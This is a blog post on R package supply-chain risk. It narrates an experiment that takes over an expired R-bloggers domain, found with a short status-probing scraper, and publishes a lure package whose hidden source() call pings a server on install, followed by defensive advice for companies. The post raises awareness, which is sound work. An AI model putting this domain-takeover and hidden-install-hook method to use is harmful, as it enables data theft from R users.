R Packages: Are we too trusting?

One of the great things about R, is the myriad of packages. Packages are typically installed via

CRAN
Bioconductor
GitHub

But how often do we think about what we are installing? Do we pay attention or just install when something looks neat? Do we think about security or just take it that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.

R-bloggers: The hook

R-bloggers is great a resource for keeping on top of what’s happening in the world of R. It’s one the resources we recommend whenever we run training courses. For an author to get their site syndicated to R-bloggers, they have to email Tal who will ensure that the site isn’t spammy. I recently saw a tweet (I can’t remember who from) who suggested tongue in cheek that to boost your website ranking, just grab a site that used to appear on R-bloggers.

This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs this package!

A list of contributing sites is nicely provided by R-bloggers. A quick and dirty script grabs select target domains. First we load a few packages

library(httr)
library(tidyverse)
library(rvest)

Then extract all URLs from the page

page_source = "https://www.r-bloggers.com/blogs-list/"  %>%
  read_html()
urls = html_attr(html_nodes(page_source, "a"), "href")

With a little helper function to get the status code

# If a site is available, it should return 200
get_status_code = function(url) {
  status = try(GET(url)$status, silent = TRUE)
  if (class(status) == "try-error")
    status = NA
  status
}

we simply probe each URL

# Lots of threads
status_codes = parallel::mclapply(urls, get_code, mc.cores = 24)
status_codes = unlist(status_codes)

In total, there were 43 URLs not returning the required status code of 200

tibble(urls = urls, status_codes = status_codes) %>%
   filter(!is.na(status_codes)) %>%
   filter(status_codes != 200) %>%
   head()

# A tibble: 6 x 2
  urls                                                     status_codes
  <chr>                                                           <int>
1 http://www.56n.dk                                                 406
2 http://bio7.org/                                                  403
3 http://www.seascapemodels.org/bluecology_blog/index.html          404
4 https://climateecology.wordpress.com                              410
5 http://www.compmath.com/blog                                      500
6 https://hamiltonblake.github.io                                   404

In the end, we went with vinux.in. Using the Wayback machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.

By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy is simply to set back and get traffic from R-bloggers.

{blogdown} & {ggplot2}: the bait

Next, I created a GitLab user rstatsgit and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package the scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used netlify to link our new blog to our recently purchased domain. The resulting blog doesn’t look too bad at all.

At the bottom of one of the .R files in the package, there is a simple source() command. This, in theory, could be used to do anything - grab data, passwords, ssh keys. Clearly, we don’t do any of this. Instead, it simply pings a site to tell us if the package has been installed.

R-bloggers & twitter: Delivery

To deliver the content, I’m going for a combination of trying to get it onto r-bloggers via the old RSS feed and tweeting about the page with the #rstats tag.

Did people install the package

I’ll update the blog post with results in a week or two.

Who is not to blame

It’s instructive to think about who is not to blame:

Gitlab/GitHub: it would be impossible for them to police who code that is uploaded to their site.
{devtools}(install_git*()): They’re many legitimate uses for this function. Blaming it would be the equivalent to blaming StackOverflow for bad advice. It doesn’t really make sense.
R-bloggers: It simply isn’t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control
The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.

Who is to blame?

Well, I suppose I’m to blame since I created the site and package ;) But more seriously if you installed the package, you’re to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, forums and not always understanding what’s going on. But the internet is a dangerous place, and most people who us R, almost certainly have juicy data that shouldn’t be released to the outside world.

By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.

How to protect against this?

This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.

The crucial thing to remember is that if someone really wants to do something unsafe, we can’t stop them. Instead, we need to provide safe alternatives that don’t hinder work while at the same time reduce overall risk.

When dealing with companies we help them tackle the problem in a number of ways

Education! Both of the team and team leaders!
Have an internal package repository. Either we build this, or use RStudio’s package manager we’re one of the few RStudio Certified partners in the world).
We may disable tools such as install_github()
Reduce risk by having clear testing and deployment machines
Implement two-factor authentication

All of the above can be circumvented by a data scientist. But the idea is with education, we can reduce the potential risk while not impeding day to day work.